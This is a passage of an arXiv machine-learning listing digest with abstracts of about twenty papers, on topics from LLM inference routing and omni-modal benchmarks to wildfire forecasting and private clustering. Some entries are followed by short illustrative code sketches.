Abstract:Maximum entropy (MaxEnt) modelling provides a principled framework for generating synthetic populations from aggregate census data, without access to individual-level microdata. The bottleneck of existing approaches is exact expectation computation, which requires summing over the full tuple space X and becomes infeasible for more than K ≈ 20 categorical attributes. We propose GibbsPCDSolver, a stochastic replacement for this computation based on Persistent Contrastive Divergence (PCD): a persistent pool of N synthetic individuals is updated by Gibbs sweeps at each gradient step, providing a stochastic approximation of the model expectations without ever materialising X. We validate the approach on controlled benchmarks and on Syn-ISTAT, a K=15 Italian demographic benchmark with analytically exact marginal targets derived from ISTAT-inspired conditional probability tables. Scaling experiments across K ∈ {12, 20, 30, 40, 50} confirm that GibbsPCDSolver maintains MRE ∈ [0.010, 0.018] while |X| grows eighteen orders of magnitude, with runtime scaling as O(K) rather than O(|X|). On Syn-ISTAT, GibbsPCDSolver reaches MRE = 0.03 on training constraints and, crucially, produces populations with effective sample size N_eff = N versus N_eff ≈ 0.012 N for generalised raking, an 86.8x diversity advantage that is essential for agent-based urban simulations.
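The PCD idea can be sketched on a toy MaxEnt model over independent binary attributes; the full solver handles categorical attributes with interactions, so the names and hyperparameters here are illustrative only:

```python
import numpy as np

def gibbs_pcd_maxent(target_marginals, pool_size=2000, steps=300, lr=0.5, seed=0):
    """Fit lambda for p(x) ∝ exp(lambda · x) on binary attributes via PCD.

    Model expectations come from a persistent pool refreshed by Gibbs
    sweeps, never from a sum over the full tuple space. For this
    independent-attribute toy model, each conditional is just
    sigmoid(lambda_k), so a sweep resamples every attribute directly.
    """
    rng = np.random.default_rng(seed)
    K = len(target_marginals)
    lam = np.zeros(K)
    pool = rng.integers(0, 2, size=(pool_size, K))   # persistent synthetic pool
    for _ in range(steps):
        # One Gibbs sweep over the pool.
        p = 1.0 / (1.0 + np.exp(-lam))
        pool = (rng.random((pool_size, K)) < p).astype(int)
        # Stochastic gradient of the dual: target minus pool expectation.
        lam += lr * (target_marginals - pool.mean(axis=0))
    return lam, pool
```

The pool doubles as the released synthetic population, which is why every individual is distinct and the effective sample size stays at N, unlike reweighting schemes such as raking.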
[LG-84] From Inference Routing to Agent Orchestration: Declarative Policy Compilation with Cross-Layer Verification
链接: https://arxiv.org/abs/2603.27299
作者: Huamin Chen,Xunzhuo Liu,Bowei He,Xue Liu
类目: Machine Learning (cs.LG)
*备注: Position Paper
Abstract:The Semantic Router DSL is a non-Turing-complete policy language deployed in production for per-request LLM inference routing: content signals (embedding similarity, PII detection, jailbreak scoring) feed into weighted projections and priority-ordered decision trees that select a model, enforce privacy policies, and produce structured audit traces – all from a single declarative source file. Prior work established conflict-free compilation for probabilistic predicates and positioned the DSL within the Workload-Router-Pool inference architecture. This paper extends the same language from stateless, per-request routing to multi-step agent workflows – the full path from inference gateway to agent orchestration to infrastructure deployment. The DSL compiler emits verified decision nodes for orchestration frameworks (LangGraph, OpenClaw), Kubernetes artifacts (NetworkPolicy, Sandbox CRD, ConfigMap), YANG/NETCONF payloads, and protocol-boundary gates (MCP, A2A) – all from the same source. Because the language is non-Turing-complete, the compiler guarantees exhaustive routing, conflict-free branching, referential integrity, and audit traces structurally coupled to the decision logic. Because signal definitions are shared across targets, a threshold change propagates from inference gateway to agent gate to infrastructure artifact in one compilation step – eliminating cross-team coordination as the primary source of policy drift. We ground the approach in four pillars – auditability, cost efficiency, verifiability, and tunability – and identify the verification boundary at each layer.
[LG-85] Omni-Modal Dissonance Benchmark: Systematically Breaking Modality Consensus to Probe Robustness and Calibrated Abstention
链接: https://arxiv.org/abs/2603.27187
作者: Zabir Al Nazi,Shubhashis Roy Dipta,Md Rizwan Parvez
类目: Machine Learning (cs.LG)
*备注:
Abstract:Existing omni-modal benchmarks attempt to measure modality-specific contributions, but their measurements are confounded: naturally co-occurring modalities carry correlated yet unequal information, making it unclear whether results reflect true modality reliance or information asymmetry. We introduce OMD-Bench, where all modalities are initially congruent - each presenting the same anchor, an object or event independently perceivable through video, audio, and text - which we then systematically corrupt to isolate each modality’s contribution. We also evaluate calibrated abstention: whether models appropriately refrain from answering when evidence is conflicting. The benchmark comprises 4,080 instances spanning 27 anchors across eight corruption conditions. Evaluating ten omni-modal models under zero-shot and chain-of-thought prompting, we find that models over-abstain when two modalities are corrupted yet under-abstain severely when all three are, while maintaining high confidence (~60-100%) even under full corruption. Chain-of-thought prompting improves abstention alignment with human judgment but amplifies overconfidence rather than mitigating it. OMD-Bench thus provides a diagnostic benchmark for modality reliance, robustness to cross-modal inconsistency, and uncertainty calibration in omni-modal systems.
[LG-86] Hybrid Deep Learning with Temporal Data Augmentation for Accurate Remaining Useful Life Prediction of Lithium-Ion Batteries
链接: https://arxiv.org/abs/2603.27186
作者: Yun Tian,Guili Wang,Jian Bi,Kaixin Han,Chenglu Wu,Zhiyi Lu,Chenhao Li,Liangwang Sun,Minyu Zhou,Chenchen Xu
类目: Machine Learning (cs.LG)
*备注:
Abstract:Accurate prediction of lithium-ion battery remaining useful life (RUL) is essential for reliable health monitoring and data-driven analysis of battery degradation. However, the robustness and generalization capabilities of existing RUL prediction models are significantly challenged by complex operating conditions and limited data availability. To address these limitations, this study proposes a hybrid deep learning model, CDFormer, which integrates convolutional neural networks, deep residual shrinkage networks, and Transformer encoders to extract multiscale temporal features from battery measurement signals, including voltage, current, and capacity. This architecture enables the joint modeling of local and global degradation dynamics, effectively improving the accuracy of RUL prediction. To enhance predictive reliability, a composite temporal data augmentation strategy is proposed, incorporating Gaussian noise, time warping, and time resampling, explicitly accounting for measurement noise and variability. CDFormer is evaluated on two real-world datasets, with experimental results demonstrating its consistent superiority over conventional recurrent neural network-based and Transformer-based baselines across key metrics. By improving the reliability and predictive performance of RUL prediction from measurement data, CDFormer provides accurate and reliable forecasts, supporting effective battery health monitoring and data-driven maintenance strategies.
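The three augmentations named above might be sketched as follows; the parameter values are illustrative, not the paper's:

```python
import numpy as np

def add_gaussian_noise(x, sigma=0.01, rng=None):
    """Additive Gaussian measurement noise."""
    rng = rng or np.random.default_rng()
    return x + rng.normal(0.0, sigma, size=x.shape)

def time_warp(x, strength=0.2, rng=None):
    """Warp the time axis with a smooth random monotone mapping."""
    rng = rng or np.random.default_rng()
    n = len(x)
    t = np.linspace(0, 1, n)
    warped_t = np.clip(t + strength * np.sin(2 * np.pi * t) * rng.uniform(-1, 1), 0, 1)
    warped_t = np.sort(warped_t)            # keep the mapping monotone
    return np.interp(t, warped_t, x)

def time_resample(x, factor=0.8):
    """Resample to a different length, then back to the original grid."""
    n = len(x)
    m = max(2, int(n * factor))
    coarse = np.interp(np.linspace(0, 1, m), np.linspace(0, 1, n), x)
    return np.interp(np.linspace(0, 1, n), np.linspace(0, 1, m), coarse)
```

Each transform preserves the series length, so augmented sequences can be mixed freely with the originals during training.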
[LG-87] Online Learning of Kalman Filtering: From Output to State Estimation
链接: https://arxiv.org/abs/2603.27159
作者: Lintao Ye,Ankang Zhang,Ming Chi,Bin Du,Jianghai Hu
类目: Machine Learning (cs.LG); Systems and Control (eess.SY); Optimization and Control (math.OC)
*备注:
Abstract:In this paper, we study the problem of learning Kalman filtering with an unknown system model in partially observed linear dynamical systems. We propose a unified algorithmic framework based on online optimization that can be used to solve both the output estimation and state estimation scenarios. By exploring the properties of the estimation error cost functions, such as conditional strong convexity, we show that our algorithm achieves a log(T)-regret in the horizon length T for the output estimation scenario. More importantly, we tackle the more challenging scenario of learning Kalman filtering for state estimation, which is an open problem in the literature. We first characterize a fundamental limitation of the problem, demonstrating the impossibility of any algorithm to achieve sublinear regret in T. By further introducing a random query scheme into our algorithm, we show that a √T-regret is achievable when the algorithm is granted limited query access to more informative measurements of the system state in practice. Our algorithm and regret readily capture the trade-off between the number of queries and the achieved regret, and shed light on online learning problems with limited observations. We validate the performance of our algorithms using numerical examples.
[LG-88] Preconditioned Attention: Enhancing Efficiency in Transformers AISTATS2026
链接: https://arxiv.org/abs/2603.27153
作者: Hemanth Saratchandran
类目: Machine Learning (cs.LG)
*备注: AISTATS 2026
Abstract:Central to the success of Transformers is the attention block, which effectively models global dependencies among input tokens associated with a dataset. However, we theoretically demonstrate that standard attention mechanisms in transformers often produce ill-conditioned matrices with large condition numbers. This ill-conditioning is a well-known obstacle for gradient-based optimizers, leading to inefficient training. To address this issue, we introduce preconditioned attention, a novel approach that incorporates a conditioning matrix into each attention head. Our theoretical analysis shows that this method significantly reduces the condition number of attention matrices, resulting in better-conditioned matrices that improve optimization. Preconditioned attention serves as a simple drop-in replacement for a wide variety of attention mechanisms in the literature. We validate the effectiveness of preconditioned attention across a diverse set of transformer applications, including image classification, object detection, instance segmentation, long sequence modeling and language modeling.
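A minimal sketch of inserting a conditioning matrix into a single attention head; the placement and form of P here are assumptions, since the paper derives its own preconditioner to reduce the condition number:

```python
import numpy as np

def softmax(z):
    z = z - z.max(axis=-1, keepdims=True)
    e = np.exp(z)
    return e / e.sum(axis=-1, keepdims=True)

def preconditioned_attention(Q, K, V, P):
    """Attention with a conditioning matrix P applied inside the
    query-key product: softmax((Q P K^T) / sqrt(d)) V.

    P is a stand-in for the paper's preconditioner; with P = I this
    reduces to standard scaled dot-product attention.
    """
    d = Q.shape[-1]
    scores = Q @ P @ K.T / np.sqrt(d)
    return softmax(scores) @ V
```

Because the change is confined to the score computation, it drops into existing attention implementations without touching the rest of the architecture, which is what makes it a drop-in replacement.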
[LG-89] ScoutAttention: Efficient KV Cache Offloading via Layer-Ahead CPU Pre-computation for LLM Inference
链接: https://arxiv.org/abs/2603.27138
作者: Qiuyang Zhang,Kai Zhou,Ding Tang,Kai Lu,Cheng Li,Zhenyu Yang,Peng Xu,Jiguang Wan
类目: Machine Learning (cs.LG)
*备注: Accepted at the 63rd Design Automation Conference (DAC 2026)
Abstract:Large language models encounter critical GPU memory capacity constraints during long-context inference, where KV cache memory consumption severely limits decode batch sizes. While existing research has explored offloading KV cache to DRAM, these approaches either demand frequent GPU-CPU data transfers or impose extensive CPU computation requirements, resulting in poor GPU utilization as the system waits for I/O operations or CPU processing to complete. We propose ScoutAttention, a novel KV cache offloading framework that accelerates LLM inference through collaborative GPU-CPU attention computation. To prevent CPU computation from bottlenecking the system, ScoutAttention introduces GPU-CPU collaborative block-wise sparse attention that significantly reduces CPU load. Unlike conventional parallel computing approaches, our framework features a novel layer-ahead CPU pre-computation algorithm, enabling the CPU to initiate attention computation one layer in advance, complemented by asynchronous periodic recall mechanisms to maintain minimal CPU compute load. Experimental results demonstrate that ScoutAttention maintains accuracy within 2.4% of baseline while achieving 2.1x speedup compared to existing offloading methods.
[LG-90] Spectral-Aware Text-to-Time Series Generation with Billion-Scale Multimodal Meteorological Data IJCNN2026
链接: https://arxiv.org/abs/2603.27135
作者: Shijie Zhang
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: Accepted By IJCNN 2026 (WCCI)
Abstract:Text-to-time-series generation is particularly important in meteorology, where natural language offers intuitive control over complex, multi-scale atmospheric dynamics. Existing approaches are constrained by the lack of large-scale, physically grounded multimodal datasets and by architectures that overlook the spectral-temporal structure of weather signals. We address these challenges with a unified framework for text-guided meteorological time-series generation. First, we introduce MeteoCap-3B, a billion-scale weather dataset paired with expert-level captions constructed via a Multi-agent Collaborative Captioning (MACC) pipeline, yielding information-dense and physically consistent annotations. Building on this dataset, we propose MTransformer, a diffusion-based model that enables precise semantic control by mapping textual descriptions into multi-band spectral priors through a Spectral Prompt Generator, which guides generation via frequency-aware attention. Extensive experiments on real-world benchmarks demonstrate state-of-the-art generation quality, accurate cross-modal alignment, strong semantic controllability, and substantial gains in downstream forecasting under data-sparse and zero-shot settings. Additional results on general time-series benchmarks indicate that the proposed framework generalizes beyond meteorology.
[LG-91] Semantic Interaction Information mediates compositional generalization in latent space
链接: https://arxiv.org/abs/2603.27134
作者: John Schwarcz
类目: Machine Learning (cs.LG)
*备注:
Abstract:Are there still barriers to generalization once all relevant variables are known? We address this question via a framework that casts compositional generalization as a variational inference problem over latent variables with parametric interactions. To explore this, we develop the Cognitive Gridworld, a stationary Partially Observable Markov Decision Process (POMDP) where observations are generated jointly by multiple latent variables, yet feedback is provided for only a single goal variable. This setting allows us to define Semantic Interaction Information (SII): a metric measuring the contribution of latent variable interactions to task performance. Using SII, we analyze Recurrent Neural Networks (RNNs) provided with these interactions, finding that SII explains the accuracy gap between Echo State and Fully Trained networks. Our analysis also uncovers a theoretically predicted failure mode where confidence decouples from accuracy, suggesting that utilizing interactions between relevant variables is a non-trivial capability. We then address a harder regime where the interactions must be learned by an embedding model. Learning how latent variables interact requires accurate inference, yet accurate inference depends on knowing those interactions. The Cognitive Gridworld reveals this circular dependence as a core challenge for continual meta-learning. We approach this dilemma via Representation Classification Chains (RCCs), a JEPA-style architecture that disentangles these processes: variable inference and variable embeddings are learned by separate modules through Reinforcement Learning and self-supervised learning, respectively. Lastly, we demonstrate that RCCs facilitate compositional generalization to novel combinations of relevant variables. Together, these results establish a grounded setting for evaluating goal-directed generalist agents. 
[LG-92] Maximin Learning of Individualized Treatment Effect on Multi-Domain Outcomes
链接: https://arxiv.org/abs/2603.27114
作者: Yuying Lu,Wenbo Fei,Yuanjia Wang,Molei Liu
类目: Machine Learning (cs.LG); Methodology (stat.ME)
*备注:
Abstract:Precision mental health requires treatment decisions that account for heterogeneous symptoms reflecting multiple clinical domains. However, existing methods for estimating individualized treatment effects (ITE) rely on a single summary outcome or a specific set of observed symptoms or measures, which are sensitive to symptom selection and limit generalizability to unmeasured yet clinically relevant domains. We propose DRIFT, a new maximin framework for estimating robust ITEs from high-dimensional item-level data by leveraging latent factor representations and adversarial learning. DRIFT learns latent constructs via generalized factor analysis, then constructs an anchored on-target uncertainty set that extrapolates beyond the observed measures to approximate the broader hyper-population of potential outcomes. By optimizing worst-case performance over this uncertainty set, DRIFT yields ITEs that are robust to underrepresented or unmeasured domains. We further show that DRIFT is invariant to admissible reparameterizations of the latent factors and admits a closed-form maximin solution, with theoretical guarantees for identification and convergence. In analyses of a randomized controlled trial for major depressive disorder (EMBARC), DRIFT demonstrates superior performance and improved generalizability to external multi-domain outcomes, including side effects and self-reported symptoms not used during training.
[LG-93] Hierarchy-Guided Topology Latent Flow for Molecular Graph Generation ICLR2026
链接: https://arxiv.org/abs/2603.27113
作者: Urvi Awasthi,Alexander Arjun Lobo,Leonid Zhukov
类目: Machine Learning (cs.LG); Materials Science (cond-mat.mtrl-sci); Machine Learning (stat.ML)
*备注: 22 pages, 2 figures, 6 tables. Accepted to ICLR 2026 AI4Mat Workshop
Abstract:Generating chemically valid 3D molecules is hindered by discrete bond topology: small local bond errors can cause global failures (valence violations, disconnections, implausible rings), especially for drug-like molecules with long-range constraints. Many unconditional 3D generators emphasize coordinates and then infer bonds or rely on post-processing, leaving topology feasibility weakly controlled. We propose Hierarchy-Guided Latent Topology Flow (HLTF), a planner-executor model that generates bond graphs with 3D coordinates, using a latent multi-scale plan for global context and a constraint-aware sampler to suppress topology-driven failures. On QM9, HLTF achieves 98.8% atom stability and 92.9% valid-and-unique, improving PoseBusters validity to 94.0% (+0.9 over the strongest reported baseline). On GEOM-DRUGS, HLTF attains 85.5%/85.0% validity/valid-unique-novel without post-processing and 92.2%/91.2% after standardized relaxation, within 0.9 points of the best post-processed baseline. Explicit topology generation also reduces “false-valid” samples that pass RDKit sanitization but fail stricter checks.
[LG-94] Conformalized Signal Temporal Logic Inference under Covariate Shift
链接: https://arxiv.org/abs/2603.27062
作者: Yixuan Wang,Danyang Li,Matthew Cleaveland,Roberto Tron,Mingyu Cai
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Signal Temporal Logic (STL) inference learns interpretable logical rules for temporal behaviors in dynamical systems. To ensure the correctness of learned STL formulas, recent approaches have incorporated conformal prediction as a statistical tool for uncertainty quantification. However, most existing methods rely on the assumption that calibration and testing data are identically distributed and exchangeable, an assumption that is frequently violated in real-world settings. This paper proposes a conformalized STL inference framework that explicitly addresses covariate shift between training and deployment trajectory datasets. From a technical standpoint, the approach first employs a template-free, differentiable STL inference method to learn an initial model, and subsequently refines it using a limited deployment-side dataset to promote distribution alignment. To provide validity guarantees under distribution shift, the framework estimates the likelihood ratio between training and deployment distributions and integrates it into an STL-robustness-based weighted conformal prediction scheme. Experimental results on trajectory datasets demonstrate that the proposed framework preserves the interpretability of STL formulas while significantly improving symbolic learning reliability at deployment time.
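The likelihood-ratio-weighted conformal step can be sketched with the standard weighted-quantile construction; the nonconformity score would be an STL robustness value in the paper's setting, while this sketch is generic:

```python
import numpy as np

def weighted_conformal_quantile(scores, weights, test_weight, alpha=0.1):
    """Weighted (1 - alpha) quantile of calibration nonconformity scores.

    weights: likelihood ratios w(x) = p_deploy(x) / p_train(x) at the
    calibration points; test_weight: the ratio at the test input. With
    uniform weights this reduces to ordinary split conformal prediction.
    """
    order = np.argsort(scores)
    s, w = np.asarray(scores, float)[order], np.asarray(weights, float)[order]
    p = np.concatenate([w, [test_weight]])
    p = p / p.sum()
    cdf = np.cumsum(p[:-1])
    idx = np.searchsorted(cdf, 1 - alpha)   # first point reaching 1 - alpha mass
    return s[idx] if idx < len(s) else np.inf
```

Upweighting calibration trajectories that look like deployment data shifts the quantile accordingly, which is how validity is restored under covariate shift.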
[LG-95] Liquid Networks with Mixture Density Heads for Efficient Imitation Learning
链接: https://arxiv.org/abs/2603.27058
作者: Nikolaus Correll
类目: Machine Learning (cs.LG); Robotics (cs.RO)
*备注:
Abstract:We compare liquid neural networks with mixture density heads against diffusion policies on Push-T, RoboMimic Can, and PointMaze under a shared-backbone comparison protocol that isolates policy-head effects under matched inputs, training budgets, and evaluation settings. Across tasks, liquid policies use roughly half the parameters (4.3M vs. 8.6M), achieve 2.4x lower offline prediction error, and run 1.8x faster at inference. In sample-efficiency experiments spanning 1% to 46.42% of training data, liquid models remain consistently more robust, with especially large gains in low-data and medium-data regimes. Closed-loop results on Push-T and PointMaze are directionally consistent with offline rankings but noisier, indicating that strong offline density modeling helps deployment while not fully determining closed-loop success. Overall, liquid recurrent multimodal policies provide a compact and practical alternative to iterative denoising for imitation learning.
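A mixture density head of the kind compared above maps features to mixture weights, means, and scales, then samples an action; a minimal sketch with stand-in weight matrices (all names hypothetical):

```python
import numpy as np

def mdn_head(h, W_pi, W_mu, W_logsig, n_comp, act_dim, rng=None):
    """Mixture density head: features h -> GMM parameters -> sampled action.

    The weight matrices stand in for the liquid network's output layer;
    sampling is a single draw rather than iterative denoising.
    """
    rng = rng or np.random.default_rng()
    logits = h @ W_pi                                  # (n_comp,)
    mu = (h @ W_mu).reshape(n_comp, act_dim)           # component means
    sigma = np.exp((h @ W_logsig).reshape(n_comp, act_dim))  # component scales
    pi = np.exp(logits - logits.max())
    pi = pi / pi.sum()                                 # mixture weights
    k = rng.choice(n_comp, p=pi)                       # pick a component
    return mu[k] + sigma[k] * rng.standard_normal(act_dim)
```

The single-pass sample is what gives the reported inference-speed advantage over diffusion policies, which need many denoising iterations per action.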
[LG-96] Beyond Freshness and Semantics: A Coupon-Collector Framework for Effective Status Updates
链接: https://arxiv.org/abs/2603.26998
作者: Youssef Ahmed,Arnob Ghosh,Chih-Chun Wang,Ness B. Shroff
类目: Systems and Control (eess.SY); Information Theory (cs.IT); Machine Learning (cs.LG)
*备注: 12 pages, 5 figures, extended version of a paper accepted to WiOpt 2026
Abstract:For status update systems operating over unreliable energy-constrained wireless channels, we address Weaver’s long-standing Level-C question: do my packets actually improve the plant’s behavior? Each fresh sample carries a stochastic expiration time – governed by the plant’s instability dynamics – after which the information becomes useless for control. Casting the problem as a coupon-collector variant with expiring coupons, we (i) formulate a two-dimensional average-reward MDP, (ii) prove that the optimal schedule is doubly thresholded in the receiver’s freshness timer and the sender’s stored lifetime, (iii) derive a closed-form policy for deterministic lifetimes, and (iv) design a Structure-Aware Q-learning algorithm (SAQ) that learns the optimal policy without knowing the channel success probability or lifetime distribution. Simulations validate our theoretical predictions: SAQ matches optimal Value Iteration performance while converging significantly faster than baseline Q-learning, and expiration-aware scheduling achieves up to 50% higher reward than age-based baselines by adapting transmissions to state-dependent urgency – thereby delivering Level-C effectiveness under tight resource constraints.
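The doubly thresholded structure can be sketched with a toy rollout; the thresholds are plain inputs here, whereas the paper derives them from the MDP, and the reward accounting is heavily simplified:

```python
import numpy as np

def doubly_thresholded_policy(receiver_timer, stored_lifetime,
                              timer_threshold, lifetime_threshold):
    """Transmit iff the receiver's information is stale enough AND the
    stored sample still has enough useful lifetime left."""
    return (receiver_timer >= timer_threshold and
            stored_lifetime >= lifetime_threshold)

def simulate(horizon, p_success, lifetime, timer_threshold,
             lifetime_threshold, seed=0):
    """Toy rollout: reward 1 per slot the receiver holds an unexpired sample."""
    rng = np.random.default_rng(seed)
    receiver_timer, stored_lifetime, reward = lifetime + 1, lifetime, 0
    for _ in range(horizon):
        if doubly_thresholded_policy(receiver_timer, stored_lifetime,
                                     timer_threshold, lifetime_threshold):
            if rng.random() < p_success:       # unreliable channel
                receiver_timer = 0
        receiver_timer += 1
        stored_lifetime = lifetime             # fresh sample each slot (toy)
        if receiver_timer <= lifetime:         # information not yet expired
            reward += 1
    return reward
```

Transmitting only when both thresholds are met is what saves energy relative to always transmitting, while the expiration check captures why pure age-based policies waste transmissions on samples that are about to become useless.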
[LG-97] ImmSET: Sequence-Based Predictor of TCR-pMHC Specificity at Scale ML4H2025
链接: https://arxiv.org/abs/2603.26994
作者: Marco Garcia Noceda,Matthew T Noakes,Andrew FigPope,Daniel E Mattox,Bryan Howie,Harlan Robins
类目: Machine Learning (cs.LG); Quantitative Methods (q-bio.QM)
*备注: Accepted to ML4H 2025 (Proceedings Track). To appear in PMLR 297
Abstract:T cells are a critical component of the adaptive immune system, playing a role in infectious disease, autoimmunity, and cancer. T cell function is mediated by the T cell receptor (TCR) protein, a highly diverse receptor targeting specific peptides presented by the major histocompatibility complex (pMHCs). Predicting the specificity of TCRs for their cognate pMHCs is central to understanding adaptive immunity and enabling personalized therapies. However, accurate prediction of this protein-protein interaction remains challenging due to the extreme diversity of both TCRs and pMHCs. Here, we present ImmSET (Immune Synapse Encoding Transformer), a novel sequence-based architecture designed to model interactions among sets of variable-length biological sequences. We train this model across a range of dataset sizes and compositions and study the resulting models’ generalization to pMHC targets. We describe a failure mode in prior sequence-based approaches that inflates previously reported performance on this task and show that ImmSET remains robust under stricter evaluation. In systematically testing the scaling behavior of ImmSET with training data, we show that performance scales consistently with data volume across multiple data types and compares favorably with the pre-trained protein language model ESM2 fine-tuned on the same datasets. Finally, we demonstrate that ImmSET can outperform AlphaFold2 and AlphaFold3-based pipelines on TCR-pMHC specificity prediction when provided sufficient training data. This work establishes ImmSET as a scalable modeling paradigm for multi-sequence interaction problems, demonstrated in the TCR-pMHC setting but generalizable to other biological domains where high-throughput sequence-driven reasoning complements structure prediction and experimental mapping.
[LG-98] Probabilistic Forecasting of Localized Wildfire Spread Based on Conditional Flow Matching
链接: https://arxiv.org/abs/2603.26975
作者: Bryan Shaddy,Haitong Qin,Brianna Binder,James Haley,Riya Duddalwar,Kyle Hilburn,Assad Oberai
类目: Machine Learning (cs.LG)
*备注:
Abstract:This study presents a probabilistic surrogate model for localized wildfire spread based on a conditional flow matching algorithm. The approach models fire progression as a stochastic process by learning the conditional distribution of fire arrival times given the current fire state along with environmental and atmospheric inputs. Model inputs include current burned area, near-surface wind components, temperature, relative humidity, terrain height, and fuel category information, all defined on a high-resolution spatial grid. The outputs are samples of arrival time within a three-hour time window, conditioned on the input variables. Training data are generated from coupled atmosphere-wildfire spread simulations using WRF-SFIRE, paired with weather fields from the North American Mesoscale model. The proposed framework enables efficient generation of ensembles of arrival times and explicitly represents uncertainty arising from incomplete knowledge of the fire-atmosphere system and unresolved variables. The model supports localized prediction over subdomains, reducing computational cost relative to physics-based simulators while retaining sensitivity to key drivers of fire spread. Model performance is evaluated against WRF-SFIRE simulations for both single-step (3-hour) and recursive multi-step (24-hour) forecasts. Results demonstrate that the method captures variability in fire evolution and produces accurate ensemble predictions. The framework provides a scalable approach for probabilistic wildfire forecasting and offers a pathway for integrating machine learning models with operational fire prediction systems and data assimilation.
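The conditional-flow-matching training target underlying such a model can be sketched for the common linear interpolation path; this is generic CFM, not the paper's exact conditioning:

```python
import numpy as np

def cfm_batch(x0, x1, rng=None):
    """One conditional flow matching training batch (linear path):
    sample t ~ U(0,1), form x_t = (1 - t) x0 + t x1, and regress the
    velocity model toward the target x1 - x0."""
    rng = rng or np.random.default_rng()
    t = rng.random((len(x0), 1))
    x_t = (1 - t) * x0 + t * x1
    v_target = x1 - x0
    return t, x_t, v_target
```

In the paper's setting, x1 would be a fire arrival-time field and the velocity model would additionally be conditioned on the environmental and atmospheric inputs; sampling then integrates the learned velocity field from noise to an arrival-time ensemble member.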
[LG-99] Neural Approximation of Generalized Voronoi Diagrams
链接: https://arxiv.org/abs/2603.26964
作者: Panagiotis Rigas,George Ioannakis,Ioannis Emiris
类目: Computational Geometry (cs.CG); Machine Learning (cs.LG)
*备注:
Abstract:We introduce VoroFields, a hierarchical neural-field framework for approximating generalized Voronoi diagrams of finite geometric site sets in low-dimensional domains under arbitrary evaluable point-to-site distances. Instead of constructing the diagram combinatorially, VoroFields learns a continuous, differentiable surrogate whose maximizer structure induces the partition implicitly. The Voronoi cells correspond to maximizer regions of the field, with boundaries defined by equal responses between competing sites. A hierarchical decomposition reduces the combinatorial complexity by refining only near envelope transition strata. Experiments across site families and metrics demonstrate accurate recovery of cells and boundary geometry without shape-specific constructions.
[LG-100] On the Optimal Number of Grids for Differentially Private Non-Interactive K-Means Clustering
Link: https://arxiv.org/abs/2603.26963
Authors: Gokularam Muthukrishnan,Anshoo Tandon
Subjects: Cryptography and Security (cs.CR); Machine Learning (cs.LG); Signal Processing (eess.SP); Machine Learning (stat.ML)
*Comments:
Abstract:Differentially private K-means clustering enables releasing cluster centers derived from a dataset while protecting the privacy of the individuals. Non-interactive clustering techniques based on privatized histograms are attractive because the released data synopsis can be reused for other downstream tasks without additional privacy loss. The choice of the number of grids for discretizing the data points is crucial, as it directly controls the quantization bias and the amount of noise injected to preserve privacy. The widely adopted strategy selects a grid size that is independent of the number of clusters and also relies on empirical tuning. In this work, we revisit this choice and propose a refined grid-size selection rule derived by minimizing an upper bound on the expected deviation in the K-means objective function, leading to a more principled discretization strategy for non-interactive private clustering. Compared to prior work, our grid resolution differs both in its dependence on the number of clusters and in the scaling with dataset size and privacy budget. Extensive numerical results demonstrate that the proposed strategy results in accurate clustering compared to the state-of-the-art techniques, even under tight privacy budgets.
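The histogram-based pipeline the paper builds on can be sketched in a few lines: discretize the data onto a grid, privatize the cell counts with the Laplace mechanism, and run weighted Lloyd iterations on the noisy histogram. The grid size, noise scale, and initialization below are illustrative placeholders, not the paper's selection rule.

```python
import numpy as np

def dp_histogram_kmeans(X, k=2, grid=8, eps=1.0, iters=20, rng=None):
    """Non-interactive DP k-means sketch: privatize a histogram once,
    then cluster the noisy grid counts without touching the raw data again."""
    rng = np.random.default_rng(rng)
    lo, hi = X.min(axis=0), X.max(axis=0)
    # Discretize each point to a grid cell and count occupancy.
    idx = np.clip(((X - lo) / (hi - lo + 1e-12) * grid).astype(int), 0, grid - 1)
    counts = np.zeros((grid,) * X.shape[1])
    for i in idx:
        counts[tuple(i)] += 1
    # Laplace mechanism: adding/removing one point changes one count, so sensitivity is 1.
    noisy = counts + rng.laplace(scale=1.0 / eps, size=counts.shape)
    w = np.maximum(noisy, 0).ravel()
    # Grid-cell centers act as weighted pseudo-points.
    coords = np.stack(np.meshgrid(*[(np.arange(grid) + 0.5) / grid] * X.shape[1],
                                  indexing="ij"), axis=-1).reshape(-1, X.shape[1])
    pts = lo + coords * (hi - lo)
    centers = pts[rng.choice(len(pts), k, replace=False)]
    for _ in range(iters):  # weighted Lloyd iterations on the noisy histogram
        d = ((pts[:, None, :] - centers[None]) ** 2).sum(-1)
        a = d.argmin(1)
        for j in range(k):
            m = (a == j) & (w > 0)
            if w[m].sum() > 0:
                centers[j] = (w[m][:, None] * pts[m]).sum(0) / w[m].sum()
    return centers

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0.0, 0.05, (100, 2)), rng.normal(1.0, 0.05, (100, 2))])
centers = dp_histogram_kmeans(X, k=2, grid=8, eps=5.0, rng=1)
```

The `grid` parameter is exactly the knob whose optimal setting the paper derives: finer grids lower quantization bias but spread the same privacy budget over more noisy counts.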
[LG-101] High dimensional theory of two-phase optimizers
Link: https://arxiv.org/abs/2603.26954
Authors: Atish Agarwala
Subjects: Machine Learning (cs.LG); Statistics Theory (math.ST)
*Comments:
Abstract:The trend towards larger training setups has brought a renewed interest in partially asynchronous two-phase optimizers which optimize locally and then synchronize across workers. Additionally, recent work suggests that the one-worker version of one of these algorithms, DiLoCo, shows promising results as a (synchronous) optimizer. Motivated by these studies we present an analysis of LA-DiLoCo, a simple member of the DiLoCo family, on a high-dimensional linear regression problem. We show that the one-worker variant, LA, provides a different tradeoff between signal and noise than SGD, which is beneficial in many scenarios. We also show that the multi-worker version generates more noise than the single worker version, but that this additional noise generation can be ameliorated by appropriate choice of hyperparameters. We conclude with an analysis of SLA – LA with momentum – and show that stacking two momentum operators gives an opportunity for acceleration via a non-linear transformation of the "effective" Hessian spectrum, which is maximized for Nesterov momentum. Altogether our results show that two-phase optimizers represent a fruitful new paradigm for understanding and improving training algorithms.
[LG-102] Tunable Domain Adaptation Using Unfolding
Link: https://arxiv.org/abs/2603.26931
Authors: Snehaa Reddy,Jayaprakash Katual,Satish Mulleti
Subjects: Machine Learning (cs.LG)
*Comments:
